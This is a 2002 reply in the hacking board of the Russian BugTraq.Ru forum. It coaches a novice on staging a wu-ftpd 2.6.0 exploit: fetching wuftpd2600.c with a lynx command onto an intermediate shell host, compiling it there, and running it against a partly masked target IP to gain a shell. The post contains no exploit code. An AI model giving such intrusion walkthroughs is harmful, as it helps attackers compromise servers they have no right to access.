информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
За кого нас держат?Страшный баг в WindowsАтака на Internet
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Бэкдор в xz/liblzma, предназначенный... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
все доски
FAQ
IRC
новые сообщения
site updates
guestbook
beginners
sysadmin
programming
operating systems
theory
web building
software
hardware
networking
law
hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
несколько другое видение вопроса 03.06.02 01:22  Число просмотров: 1232
Автор: Dude Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> > 2) так-как я не знал как закачать файл я использовал
> lynx
> > lynx -source
> http://www.xxxsitexxx.xx/exploit/wuftpd2600.c >
> wuftpd2600.c&
>
> Хм... эта же команда наоборот закачивает на ТВОЮ тачку файл
> wuftpd2600.c с сервера xxx.xxxsitexxx.xx

Я так понимаю (так написано):

Чел сидит на машине X. У чела есть шелл на машине Y. И он хочет похачить сервак на машине Z (212.ххх.ххх.ххх). Челу надо залить эксплоит на Y. Он из шелла на Y запускает Lynx, и им закачивает на Y (с xxx.xxxsitexxx.xx) эксплоит. Усе нормально.

Правда (это уже для МНМ) лучше это делать через ФТП, если на Y есть тоже ФТП-сервер. Логинишься к нему клиентом ФТП под своим логином/паролем на Y, и заливаешь файл на Y.

> > терь я подключаюсь к фтп
> > ftp 212.xxx.xxx.xxx
> > ну тут мне говорят типа дрямки wu-ftpd 2.6.0(1) итд
> итп, НУ
> > так вот терь мне нада скомпилировать эксплоит НОкак ,
> > но я знаю как ,то есть я не могу сказать bash штоб он
> > компилировал эксплоит ,при этом не выходя из фтп
> ......:(

Забудь про ФТП-сервер на 212.ххх.ххх.ххх. Компилишь wuftpd2600.c на Y, на том шелле, который у тебя есть. Он (эксплоит) при запуске требует параметр (может, и не один). Этот параметр - айпишник 212.ххх.ххх.ххх, то есть запускаешь

wuftpd2600 212.xxx.xxx.xxx

С ФТП-сервером общаться будет сам эксплоит, находясь на твоем шелле.

>
> Насколько я понял, ты хочешь своим эксплоитом порутить
> фтп-сервер, при этом находясь на совсем левом шелле? Супер
> =))))
> Дело в том, что чтобы тебе была польза от твоего эксплоита,
> те нужен доступ к шеллу на той тачке, на которой стоит
> нужный тебе фтп-шник!
> (Если я тя не так понял, то значит не так понял =) Просто
> поправь тада)
>

Все опять-таки нормально. Шелл на тачке с ФТПшником ему даст эксплоит, запущенный на промежуточной тачке (Y в моей терминологии). А с тачкой Y он общается с тачки X.
<hacking> Поиск 






Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach